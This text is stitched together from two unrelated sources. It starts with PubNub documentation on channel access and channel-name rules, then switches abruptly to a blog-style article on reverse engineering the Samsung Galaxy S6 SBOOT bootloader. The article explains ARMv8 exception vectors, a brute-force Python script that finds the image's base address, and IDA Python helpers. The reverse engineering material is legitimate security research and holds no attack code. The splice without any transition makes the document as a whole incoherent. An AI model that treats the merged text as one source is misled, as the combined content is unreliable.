You can secure your channels by controlling the access to them using PubNub Access Manager which is discussed in User Permissions. With Access Manager disabled, any client can freely send and receive messages on any channel. This is fine while you're learning to use PubNub but eventually, you'll need to secure your channels.
Channel Names
A channel name can be any alphanumeric string up to 92 UTF-8 characters. Channel names are unique per PubNub key, and you can have the same name in another key, even within the same PubNub account. In other words, a PubNub key is a namespace for your channels.
Invalid Characters
, : * / \ and Unicode Zero, whitespace, and non-printable ASCII characters.
Valid Characters
_ - = @ . ! $ # % & ^ ;
A period (.) is valid, but it is a special character used by wildcard features, so use it strategically to leverage those features: wildcard channel subscribe, wildcard channel granting, and Function wildcard channel binding.
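Taken together, the naming rules above can be approximated with a short validator. This is a hedged illustration of the documented constraints, not PubNub's official validation logic:

```python
# Characters documented as invalid in PubNub channel names.
INVALID_CHARS = set(',:*/\\')

def is_valid_channel(name):
    """Approximate check of the channel-name rules described above."""
    if not 1 <= len(name) <= 92:          # up to 92 characters
        return False
    for ch in name:
        if ch in INVALID_CHARS:           # , : * / \
            return False
        if ch.isspace() or not ch.isprintable():  # whitespace, NUL, non-printables
            return False
    return True

print(is_valid_channel("family.chat-room_1"))  # True
print(is_valid_channel("bad:name"))            # False
```

Note that a period passes this check; as described above, it should still be reserved for wildcard features.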
Various Samsung Exynos based smartphones use a proprietary bootloader named SBOOT. It is the case for the Samsung Galaxy S7, Galaxy S6 and Galaxy A3, and probably many more smartphones listed on Samsung Exynos Showcase [1]. I had the opportunity to reverse engineer pieces of this bootloader while assessing various TEE implementations. This article is the first from a series about SBOOT. It recalls some ARMv8 concepts, discusses the methodology I followed and the right and wrong assumptions I made while analyzing this undocumented proprietary blob used on the Samsung Galaxy S6.
Context
Lately, I have been lucky enough to assess and to hunt bugs in several implementations of Trusted Execution Environment (TEE) as my day job. As a side project, I began to dig into more TEE implementations, especially on smartphones I had, for personal use or at work and, coincidentally, they come from the same software editor, namely Trustonic [2], co-founded by ARM, G&D and Gemalto. Being Exynos-based is the only common characteristic between the smartphones I had at hand.
Trustonic's TEE, named <t-base, has evolved from Mobicore, G&D's former TEE. To my knowledge, very little public technical information exists on this TEE or its former version. Analyzing it suddenly became way more challenging and more interesting than I initially thought. Let's focus on Samsung Galaxy S6 and investigate further!
While identifying trusted applications on the file system was the easiest part of the challenge, looking for the TEE OS on Exynos smartphones I analyzed is comparable to looking for a needle in a haystack. Indeed, the dedicated partition storing the image of the TEE OS that you can find on some smartphones (on Qualcomm based SoC for instance), cannot be found. It must be stored somewhere else, probably in the bootloader itself, and it is the reason why I started to reverse engineer SBOOT. This article is the first of a series narrating my journey to the TEE OS. I am going to focus on how to determine Samsung S6 SBOOT's base address and load it in IDA.
ARMv8 Concepts
Before launching IDA Pro, let me recall some fundamentals of ARMv8. I'll introduce here several concepts that might be useful to people new to ARMv8 and already used to ARMv7. For a precise and complete documentation, refer to ARMv8 Programmer's Guide [3]. As I am no ARMv8 expert, feel free to add comments if you see any mistake or needed precision.
Exception Levels
ARMv8 has introduced a new exception model built around exception levels. An exception level determines the privilege level (PL0 to PL3) at which software components run, in either processor mode (non-secure or secure). Execution at ELn corresponds to privilege PLn and, the greater n is, the more privileges an execution level has.
Exception Vector Table
When an exception occurs, the processor branches to an exception vector table and runs the corresponding handler. In ARMv8, each exception level has its own exception vector table. For those who are used to reverse engineer ARMv7 bootloaders, you will notice that its format is totally different from ARMv7:
The astute reader may have noticed that entries of the exception vector table are 128 (0x80) bytes long on ARMv8, whereas each entry is only 4 bytes wide on ARMv7, and each entry holds a sequence of exception handling instructions. While the location of the exception vector table is determined by VTOR (Vector Table Offset Register) on ARMv7, ARMv8 uses three VBARs (Vector Based Address Registers) VBAR_EL3, VBAR_EL2 and VBAR_EL1. Note that, for a specific level, the handler (or the table entry) that is going to be executed depends on:
- the type of the exception (synchronous, IRQ, FIQ, or SError),
- whether the exception is taken from the current exception level or from a lower one,
- the execution state (AArch64 or AArch32) of the level the exception is taken from.
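Concretely, those factors select one of the sixteen 0x80-byte entries below VBAR. Here is a toy model of the AArch64 vector-table layout (an illustration of the architecture, not code lifted from SBOOT):

```python
# Base offset of each 4-entry group in an AArch64 exception vector table.
GROUP_BASE = {
    ("current_el", "sp_el0"):  0x000,
    ("current_el", "sp_elx"):  0x200,
    ("lower_el",   "aarch64"): 0x400,
    ("lower_el",   "aarch32"): 0x600,
}
# Offset of each exception type within a group (one 0x80-byte entry each).
TYPE_OFFSET = {"synchronous": 0x000, "irq": 0x080, "fiq": 0x100, "serror": 0x180}

def vector_entry(vbar, origin, exc_type):
    """Address of the handler entry the core branches to."""
    return vbar + GROUP_BASE[origin] + TYPE_OFFSET[exc_type]

# An SMC from EL1 is a synchronous exception taken from a lower EL in AArch64:
print(hex(vector_entry(0x2111000, ("lower_el", "aarch64"), "synchronous")))  # 0x2111400
```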
A software component running at a given exception level can interact with software running at more privileged exception levels using dedicated instructions. For instance, a user-mode process (EL0) makes a system call handled by the kernel (EL1) by issuing a Supervisor Call (SVC), the kernel can interact with a hypervisor (EL2) with Hypervisor Calls (HVC) or directly with the secure monitor (EL3) using Secure Monitor Calls (SMC), etc. These service calls generate synchronous exceptions handled by one of the exception vector table's synchronous handlers.
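As an aside, an SMC carries a 32-bit function identifier whose bit layout routes the call: per the ARM SMC Calling Convention, bit 31 distinguishes fast calls and bits [29:24] hold the Owning Entity Number (OEN) used to pick a runtime service. A minimal sketch of that routing:

```python
def oen(function_id):
    """Owning Entity Number: bits [29:24] of the SMC function identifier."""
    return (function_id >> 24) & 0x3f

def is_fast_call(function_id):
    """Bit 31 set means a 'fast' (atomic) call rather than a yielding one."""
    return bool(function_id & 0x80000000)

# e.g. the standard PSCI CPU_ON call 0x84000003 (standard service range, OEN 4):
fid = 0x84000003
print(oen(fid), is_fast_call(fid))  # 4 True
```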
Enough architectural insights for this article, I will write more about this in the upcoming articles. Let us try to load SBOOT into IDA Pro and try to reverse engineer it.
Disassembling SBOOT
To the best of my knowledge, SBOOT uses a proprietary format that is not documented.
The Samsung Galaxy S6 is powered by 1.5GHz 64-bit octa-core Samsung Exynos 7420 CPU. Recall that ARMv8 processors can run applications built for AArch32 and AArch64. Thus, one can try to load SBOOT as a 32-bit or a 64-bit ARM binary.
I assumed that the BootROM had not switched to AArch32 state and loaded it first into IDA Pro as a 64-bit binary, leaving the default options:
- Processor Type: ARM Little Endian [ARM]
- Disassemble as 64-bit code: Yes
Many AArch64 instructions were automatically recognized. When poking around disassembled instructions, basic blocks made sense, letting me think that I really dealt with AArch64 code:
Determining the Base Address
It took me a few days to determine the right base address. As giving you directly the solution is pointless, I first detail all the things I have tried until making the correct assumption which gave me the right base address. As the proverb says, whoever [4] wrote this: "Give a man a fish and you feed him for a day; teach a man to fish and you feed him for a lifetime".
Web Search
I started by searching for Samsung bootloader and SBOOT related work on several search engines. Unfortunately, results on the subject were scarce and only one reverseengineering.stackexchange.com thread [5] dating back to March 2015 was relevant.
This thread mainly gives us 2 hints. J-Cho had the intuition that the bootloader starts at the file offset 0x3F000 and Just helping suggests that it is actually starting at 0x10.
As I wanted to dismiss my hypothesis that the bootloader base address is 0x00000000 and that its code always begins at 0x10, I started to look for bootloaders used in other Exynos smartphones. SBOOT in Meizu's smartphones does not give valid instructions at 0x10, confirming my doubts:
I also analyzed if there were any debug string left on other bootloaders that would give me hints on where SBOOT is generally loaded in memory. No luck :( But I got another lead: some strings in Meizu's SBOOT suggested that U-Boot is used. Even if U-Boot is not used on Samsung Galaxy S6, it was a lead worth exploring and I started to dig further.
U-Boot Repository
U-Boot is open-source and supports several Exynos chips. For instance, Exynos 4 and Exynos 5 have been supported for more than 5 years now. Support for the Exynos 7 has not fully landed on the mainline yet but, based on their mailing list [6], some patches exist for the Exynos 7 ESPRESSO development board.
I may have missed it, but going through patches for the ESPRESSO development board did not bear fruits :( I tried multiple known base addresses from Exynos 4 to Exynos 7 boards without succeeding. It was time to try another angle.
ARM Literal Pools
If you are used to reverse engineering ARM assembly, you must have noticed the massive use of literal pools to hold certain constant values that are to be loaded into registers. This property may help us to find approximately where SBOOT is loaded, especially when a branch destination address is loaded from a literal pool.
I searched all the branching instructions marked with errors in operands (highlighted in red) by IDA Pro. As the code of a bootloader is self-contained, I can safely assume that most of the branches destination address must target code in the bootloader itself. With this assumption, I could approximate the bootloader's base address.
From the very first instructions, I noticed the following branching errors:
The interesting facts on these code fragments are:
- Branching instructions BR (Branch to register) are unconditional and suggest that it will not return.
- The operand value for both branches is the same (0x2104010), and it appears very early in the bootloader.
- The last byte is 0x10 which is exactly the offset where the code of the bootloader seems to begin.
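This intuition — most absolute targets harvested from literal pools must land inside the image — can be turned into a tiny constraint solver. The sketch below is a toy illustration: 0x2104010 is the value observed above, while the second target and the image size are assumptions made up for the example:

```python
def candidate_bases(targets, image_size, page=0x1000):
    """Page-aligned load addresses that keep every absolute target in-image."""
    lo = max(0, max(targets) - image_size + 1)   # base can't be lower than this
    hi = min(targets)                            # ...nor higher than the lowest target
    first = (lo + page - 1) & ~(page - 1)        # round up to page alignment
    return list(range(first, hi + 1, page))

# 0x2104010 was observed above; 0x2111000 is a second, hypothetical target.
bases = candidate_bases([0x2104010, 0x2111000], image_size=0x100000)
print(hex(bases[0]), hex(bases[-1]))  # 0x2012000 0x2104000
```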
I arbitrarily assumed that the address 0x2104010 was a reset address and I tried to load the SBOOT binary at 0x2104000, with the following options:
- Processor Type: ARM Little Endian [ARM]
- Start ROM Address: 0x2104000
- Disassemble as 64-bit code: Yes
At least, IDA Pro found fewer errors which indicates that my assumption may be correct. Yet, I could not tell for sure that this base address was the right one, I needed to reverse engineer further to be sure. Spoiler: I nearly got it right :)
ARM System Registers
Now that I may have the potential base address, I continued reverse engineering SBOOT hoping that there were no anomalies in the code flow.
As I wanted to find the TEE OS, I started searching for pieces of code executed in the secure monitor. A rather simple technique to find the secure monitor consists in looking for instructions that set or read registers that can only be accessed from the secure monitor. As previously mentioned, the secure monitor runs in EL3. VBAR_EL3 is rather a good candidate to find EL3 code as it holds the base address of the EL3 exception vector table and leads to SMC handlers.
Do you remember the exception vector table's format presented at the beginning of this article? It is made of 16 entries of 0x80 bytes holding the code of exception handlers. Amongst the search results, code at 0x2111000 seemed to lead to a valid exception vector table:
Even so, the chosen base address was still not the right one :( When verifying other instructions that set VBAR_EL3, one can note that 0x210F000 falls in the middle of a function:
These anomalies would suggest that 0x2104000 is not the right base address yet. Let us try something else.
Service Descriptors
Samsung Galaxy S6 SBOOT is partly based on ARM Trusted Firmware [7]. ARM Trusted Firmware is open-source and provides a reference implementation of secure world software for ARMv8-A, including a Secure Monitor executing at Exception Level 3 (EL3). The assembly code corresponding to the secure monitor is exactly the same as the one in ARM Trusted Firmware. This is good news because it will buy me some time and save me reverse engineering efforts.
I tried to find another anchor point in the disassembled code I could use to determine the base address of SBOOT. Members of type char * in structures are particularly interesting candidates as they point to strings whose addresses are defined at compile time. While comparing SBOOT disassembled code and ARM Trusted Firmware source code, I identified a structure, rt_svc_desc_t, that had the property I was looking for:
typedef struct rt_svc_desc {
    uint8_t start_oen;
    uint8_t end_oen;
    uint8_t call_type;
    const char *name;
    rt_svc_init_t init;
    rt_svc_handle_t handle;
} rt_svc_desc_t;
According to ARM Trusted Firmware's source code, rt_svc_descs is an array of rt_svc_desc_t that holds the runtime service descriptors exported by services. It is used in the function runtime_svc_init which can be easily located in SBOOT thanks to debug strings in its calling function bl31_main:
I tried to map the binary at different addresses and checked whether I could find valid strings for rt_svc_desc.name entries. Here is a small bruteforcing script:
import sys
import string
import struct

RT_SVC_DESC_FORMAT = "BBB5xQQQ"
RT_SVC_DESC_SIZE = struct.calcsize(RT_SVC_DESC_FORMAT)
RT_SVC_DESC_OFFSET = 0xcb50
RT_SVC_DESC_ENTRIES = (0xcc10 - 0xcb50) / RT_SVC_DESC_SIZE

if len(sys.argv) != 2:
    print("usage: %s <sboot.bin>" % sys.argv[0])
    sys.exit(1)

sboot_file = open(sys.argv[1], "rb")
sboot_data = sboot_file.read()

rt_svc_desc = []
for idx in range(RT_SVC_DESC_ENTRIES):
    start = RT_SVC_DESC_OFFSET + (idx << 5)
    desc = struct.unpack(RT_SVC_DESC_FORMAT,
                         sboot_data[start:start+RT_SVC_DESC_SIZE])
    rt_svc_desc.append(desc)

strlen = lambda x: 1 + strlen(x[1:]) if x and x[0] in string.printable else 0

for base_addr in range(0x2100000, 0x21fffff, 0x1000):
    names = []
    print("[+] testing base address %08x" % base_addr)
    for desc in rt_svc_desc:
        offset = desc[3] - base_addr
        if offset < 0:
            sys.exit(0)
        name_len = strlen(sboot_data[offset:])
        if not name_len:
            break
        names.append(sboot_data[offset:offset+name_len])
    if len(names) == RT_SVC_DESC_ENTRIES:
        print("[!] w00t!!! base address is %08x" % base_addr)
        print("    found names: %s" % ", ".join(names))
Running this script on the analyzed SBOOT gave the following output:
$ python bf_sboot.py sboot.bin
[+] testing base address 02100000
[+] testing base address 02101000
[+] testing base address 02102000
[!] w00t!!! base address is 02102000
    found names: mon_smc, std_svc, tbase_dummy_sip_fastcall, tbase_oem_fastcall, tbase_smc, tbase_fastcall
[...]
Victory! Samsung Galaxy S6 SBOOT's base address is 0x02102000. Reloading the binary into IDA Pro with this base address seems to correct all the oddities in the disassembled code I have seen so far. We are sure to have the right one now!
Enhancing the Disassembly
The reverse engineering process is like solving a puzzle. One tries to understand how a piece of software works by putting back together bits of information. Thus, the more information you have, the easier the puzzle solving is. Here are some tips that helped me before and after finding the right base address.
Missed Functions
While IDA Pro does an excellent job in disassembling common file formats, it will likely miss a lot of functions when reversing unknown binaries. In this situation, a common habit is to write a script looking for prologue instructions and declaring that a function exists at these spots. A simple AArch64 function prologue looks like this:
// AArch64 PCS assigns the frame pointer to x29
sub sp, sp, #0x10
stp x29, x30, [sp]
mov x29, sp
The instruction mov x29, sp is a rather reliable marker for AArch64 prologues. The idea to find the beginning of the function is to search for this marker and to disassemble backward while common prologue instructions (mov, stp, sub for instance) are found. A function that searches for AArch64 prologues looks like this in IDA Python:
import idaapi

def find_sig(segment, sig, callback):
    seg = idaapi.get_segm_by_name(segment)
    if not seg:
        return
    ea, maxea = seg.startEA, seg.endEA
    while ea != idaapi.BADADDR:
        ea = idaapi.find_binary(ea, maxea, sig, 16, idaapi.SEARCH_DOWN)
        if ea != idaapi.BADADDR:
            callback(ea)
            ea += 4

def is_prologue_insn(ea):
    idaapi.decode_insn(ea)
    return idaapi.cmd.itype in [idaapi.ARM_stp, idaapi.ARM_mov, idaapi.ARM_sub]

def callback(ea):
    flags = idaapi.getFlags(ea)
    if idaapi.isUnknown(flags):
        while ea != idaapi.BADADDR:
            if is_prologue_insn(ea - 4):
                ea -= 4
            else:
                print("[*] New function discovered at %#lx" % (ea))
                idaapi.add_func(ea, idaapi.BADADDR)
                break
    if idaapi.isData(flags):
        print("[!] %#lx needs manual review" % (ea))

mov_x29_sp = "fd 03 00 91"
find_sig("ROM", mov_x29_sp, callback)
ARM64 IDA Plugins
AArch64 mov simplifier
Compilers sometimes optimize code, making it harder to read for a human. Using IDA Pro's API, one can write an architecture-specific code simplifier. I found the AArch64 code simplifier shared by @xerub quite useful. Here is an example of AArch64 disassembly:
ROM:0000000002104200    BL      sub_2104468
ROM:0000000002104204    MOV     X19, #0x814
ROM:0000000002104208    MOVK    X19, #0x105C,LSL#16
ROM:000000000210420C    MOV     X0, X19
@xerub's "AArch64 mov simplifier" [8] changes the disassembly as follows:
ROM:0000000002104200    BL      sub_2104468
ROM:0000000002104204    MOVE    X19, #0x105C0814
ROM:000000000210420C    MOV     X0, X19
Astute readers will probably notice that MOVE isn't a valid ARM64 instruction. MOVE is simply a marker to tell the reverse engineer that current instructions have been simplified and substituted by this instruction.
FRIEND
Reverse engineering ARM low-level code in IDA Pro has always been tedious. Figuring out what an instruction related to the system control coprocessor does is a horrible experience as IDA Pro disassembles the instruction without register aliasing. If you had the choice, which one would you prefer to read:
msr vbar_el3, x0
or
msr #6, c12, c0, #0, x0
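What the helper plugins discussed below essentially do is map the raw (op1, CRn, CRm, op2) operands back to an architectural register name. A hand-rolled sketch with a deliberately tiny alias table (only a handful of registers, for illustration):

```python
# (op1, CRn, CRm, op2) -> architectural name, for a handful of registers.
SYSREG_ALIASES = {
    (0, 12, 0, 0): "VBAR_EL1",
    (4, 12, 0, 0): "VBAR_EL2",
    (6, 12, 0, 0): "VBAR_EL3",
    (6,  1, 0, 0): "SCTLR_EL3",
}

def sysreg_name(op1, crn, crm, op2):
    """Alias a raw MSR/MRS operand tuple, falling back to the generic form."""
    return SYSREG_ALIASES.get((op1, crn, crm, op2),
                              "S3_%d_C%d_C%d_%d" % (op1, crn, crm, op2))

# "msr #6, c12, c0, #0, x0" is therefore a write to:
print(sysreg_name(6, 12, 0, 0))  # VBAR_EL3
```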
ARM helper plugins help in improving IDA Pro's disassembly. IDA AArch64 Helper Plugin [9] by Stefan Esser (@i0n1c) is such a plugin. Unfortunately, it is not publicly available. Alex Hude (@getorix) wrote a similar plugin, FRIEND [10], for MacOS. If you have been following the project closely, you may have seen that I recently pushed modifications [11], merged last week, that make it cross-platform. Now, you have FRIENDs for Windows, Linux, and MacOS :)
Signatures
As previously mentioned, SBOOT is partly based on ARM Trusted Firmware [12]. Since the source code is available, one can save a lot of reverse engineering effort by browsing the source code, recompiling it, and doing binary diffing (or signature matching) in order to recover as many symbols as possible.
I generally combine multiple binary diffing tools to propagate symbols between binaries:
- Rizzo [13] from Craig Heffner (devttys0)
- Bindiff [14] from Zymanics
- Diaphora [15] from Joxean Koret (@matalaz)
They sometimes have complementary results.
Conclusion
In this article, I described how to determine SBOOT's base address for the Samsung Galaxy S6 and how to load it into IDA Pro. The method described here should be applicable to other Samsung smartphones and probably to other manufacturers' products using an Exynos SoC.
The journey to the TEE OS will continue in the next article. Stay tuned folks!
References
Acknowledgements
- jb for all the discussions we had and for his help.
- André "sh4ka" Moulu for encouraging me to write this series of articles, describing my journey to the TEE OS.
- Quarkslab colleagues for their feedback on this article. | https://blog.quarkslab.com/reverse-engineering-samsung-s6-sboot-part-i.html | CC-MAIN-2019-09 | refinedweb | 2,910 | 52.19 |
Assert that placeholders are reflowed before their out-of-flows
RESOLVED FIXED in mozilla24
Status
People
(Reporter: bzbarsky, Assigned: dholbert)
Tracking
(Depends on: 1 bug)
Bug Flags:
Firefox Tracking Flags
(Not tracked)
Details
Attachments
(2 attachments, 2 obsolete attachments)
This came up in bug 851514. We should assert when a placeholder gets its first reflow after the out-of-flow's first reflow.
Status: NEW → ASSIGNED
OS: Mac OS X → All
Hardware: x86 → All
Version: unspecified → Trunk
Created attachment 752232 [details] [diff] [review] patch v1: Assert that placeholders are reflowed before their out-of-flows.
So with that patch, I hit asserts at least on the following (I say at least, because the fatal assert kills the test run): Mochitest: layout/generic/test/test_bug394239.html Reftest: layout/reftests/abs-pos/continuation-positioned-inline-1.html Crashtest: layout/base/crashtests/310638-2.html All seem to involve rel-pos inlines with continuations and the like with abs-pos kids. Which is not surprising: the placeholder might be in a later continuation while the abs-pos kid is parented to the first continuation and reflows when that reflows. In other words, things like bug 489100, bug 489207, bug 490216, bug 507307, bug 629059, bug 667079 ...
Assignee: bzbarsky → nobody
Status: ASSIGNED → NEW
Hmm, OK. So in cases where the placeholder is in a continuation, then this is something that's allowed to happen. Would it make sense to stick this in #ifdef DEBUG and do something like

if (none of the frames in my ancestor chain have previous continuations) {
  [assertion goes here]
}

?
Well, it's allowed to happen now. It's buggy if it happens.... We could do something like that; a bit worried about the overhead.
Yeah, the overhead would be debug-only but still a little sucky. This would avoid the overhead (except in the cases where we're buggy):

#ifdef DEBUG
if (placeholder is being reflowed after its OOF) {
  // Buggy!
  if (any of my ancestors is a continuation) {
    // Just a warning because we have tests that trigger this, unfortunately:
    NS_WARNING("placeholder getting its first reflow after its OOF frame");
  } else {
    NS_ERROR("placeholder getting its first reflow after its OOF frame");
  }
}
#endif

I'll spin up a patch to do that.
Created attachment 752571 [details] [diff] [review] patch v2: assert or warn, depending on whether we're in a continuation Here's a patch along the lines of my previous comment. Try run:
Comment on attachment 752571 [details] [diff] [review] patch v2: assert or warn, depending on whether we're in a continuation Yay, Try likes this. Requesting review.
Attachment #752571 - Flags: review?(bzbarsky)
I verified that this asserts on bug 851514's testcase if I back out its patch, too. (as we'd hope)
Comment on attachment 752571 [details] [diff] [review] patch v2: assert or warn, depending on whether we're in a continuation r=me
Attachment #752571 - Flags: review?(bzbarsky) → review+
Assignee: nobody → dholbert
Status: NEW → ASSIGNED
Flags: in-testsuite-
Backed out in because layout/generic/crashtests/656130-2.html and layout/generic/crashtests/660451-1.html both say "dude, that's totally normal to us, we reflow our out-of-flows before our placeholders twice every single time we're run!"
d'oh. I forgot to include crashtests in the Try run. Thanks, philor.
needinfo=me to investigate
Flags: needinfo?
Flags: needinfo? → needinfo?(dholbert)
(BTW, the two failing crashtests are actually identical (md5sum and all). I just opened bug 876194 to clean that up.)
Flags: needinfo?(dholbert)
Created attachment 754228 [details] breaktest 1 Here's a reduced static testcase that triggers the NS_ERROR in the formerly-landed patch.
So we're failing the assertion in cases where there's an IB split, and the abspos frame falls in an IB sibling before its placeholder. I think this is a situation like comment 2 (but with IB siblings instead of continuations). We could probably just extend the patch's existing exemption for continuations to cover IB siblings, too.
Created attachment 754229 [details] [diff] [review] patch v3: add IB-split siblings to exemption This changes the existing "isInContinuation" exemption to "isInContinuationOrIBSplit". The point is to check for cases where the placeholder is in a later continuation or a later IB-split sibling than its out-of-flow, and only warn in those cases.
Attachment #754229 - Flags: review?(bzbarsky)
Attachment #754229 - Attachment description: add IB siblings to exemption → patch v3: add IB-split siblings to exemption
Attachment #752571 - Attachment description: assert or warn, depending on whether we're in a continuation → patch v2: assert or warn, depending on whether we're in a continuation
Attachment #752571 - Attachment is obsolete: true
Attachment #752232 - Attachment description: Assert that placeholders are reflowed before their out-of-flows. → patch v1: Assert that placeholders are reflowed before their out-of-flows.
Attachment #752232 - Attachment is obsolete: true
Comment on attachment 754229 [details] [diff] [review] patch v3: add IB-split siblings to exemption Might be worth it to put a GetPrevContinuationOrSpecialSibling on nsLayoutUtils (similar to the GetNext... method already there) and use it here. If we do that, we should check for the NS_FRAME_IS_SPECIAL flag. r=me either way
Attachment #754229 - Flags: review?(bzbarsky) → review+
I'll keep it simple & leave it as-is for now, especially since this check is just there as a hackaround for another bug. But I'll add a comment saying something like: // (This could eventually nsLayoutUtils::GetPrevContinuationOrSpecialSibling(), // if we ever add a function like that.) so that if someone adds that function for other reasons, they might find & simplify this code.
> // (This could eventually nsLayoutUtils::GetPrevContinuationOrSpecialSibling(), (er, s/eventually/eventually call/) Looks like inbound is hosed, so I'll land this tomorrow.
Status: ASSIGNED → RESOLVED
Last Resolved: 6 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla24 | https://bugzilla.mozilla.org/show_bug.cgi?id=874418 | CC-MAIN-2018-43 | refinedweb | 966 | 53 |
Hi there
I wanna This is a "test". C code
Thanks alot
Test what, our patience? Seriously, even if anyone here were inclined to simply provide code to you - which we are not - you would need to give a lot more detail about what you need.
One of the forum rules states that, when posting for help with a program, you must demonstrate due diligence - you need to show that you have made a good-faith effort to solve the problem yourself, and that you have reached an impasse you can't resolve. In other words, show us your code. If you don't have any code to show us, tell us what you need help in doing. Make an effort first, before asking for a hand-out.
Hi there
No.
I'll write that program for you, after I see you have deposited $1,000.00 USD in my PayPal account.
Edited 4 Years Ago
by Ancient Dragon
#include <stdio.h>
main()
{
printf("this is a %s",""test"");
return0;
}
The main purpose is to show "test" in output
is this true?
Presumably the purpose is to show 'this is a "test"' as the output. Unfortunately, the code is wrong even if you exclude the syntax error in your return statement. You must escape double quotes in a string:
printf("this is a %s", "\"test\"");
string sentence="This is a test";
printf("%s",&sentence);
//maybe these will. ... | https://www.daniweb.com/programming/software-development/threads/452528/c-code-request | CC-MAIN-2017-26 | refinedweb | 255 | 80.51 |
Background
An increasingly popular alternative to XML is JSON (JavaScript Object Notation). It is a simplistic text-based format that is designed to be human readable. Unlike XML, it has no notion of namespaces and can only represent data in the format of associative arrays.
Retrieving JSON
All Data APIs support JSON output through the use of the alt parameter. For example, you can retrieve the current most popular videos from YouTube in JSON format as follows:
Using the Data API with JavaScript
When you are working with JavaScript, you can avoid crossdomain restrictions by loading results from the Data API through a <script> tag with a custom callback. To do this you set the alt parameter to have the value json-in-script and also use the callback parameter to identify what JavaScript function should be called once the results have been loaded.
A simple example is retrieving all of the uploads for a particular user, in this case 'GoogleDevelopers':
<script type="text/javascript" src=""> </script>
The v parameter ensures we are using Version 2 of the API. The format parameter ensures we are only retrieving videos that can be embedded in an external webpage. The callback parameter is specifying showMyVideos as the function to execute once the results are returned. This function could look something like:
function showMyVideos(data) {
  var feed = data.feed;
  var entries = feed.entry || [];
  var html = ['<ul>'];
  for (var i = 0; i < entries.length; i++) {
    var entry = entries[i];
    var title = entry.title.$t;
    html.push('<li>', title, '</li>');
  }
  html.push('</ul>');
  document.getElementById('videos').innerHTML = html.join('');
}
This code inserts an unordered list of videos into a <div> (or other block-level element) with the id of "videos" on the page. Each list item will be the video's title.
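The same extraction works outside the browser too; here is a hedged Python equivalent of the title-gathering logic above (the sample feed is fabricated for illustration):

```python
def extract_titles(data):
    """Mirror of showMyVideos: pull each entry's title out of a parsed feed."""
    feed = data.get("feed", {})
    entries = feed.get("entry", [])
    return [entry["title"]["$t"] for entry in entries]

# A tiny fabricated feed in the same shape the API returns:
sample = {"feed": {"entry": [{"title": {"$t": "Intro to the Data API"}},
                             {"title": {"$t": "JSON explained"}}]}}
print(extract_titles(sample))  # ['Intro to the Data API', 'JSON explained']
```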
Of course there is much more you can do, such as showing a thumbnail for the video or using it with our Player APIs. For more examples and code check out the YouTube JSON codelab. | https://developers.google.com/youtube/2.0/developers_guide_json | CC-MAIN-2016-36 | refinedweb | 331 | 62.48 |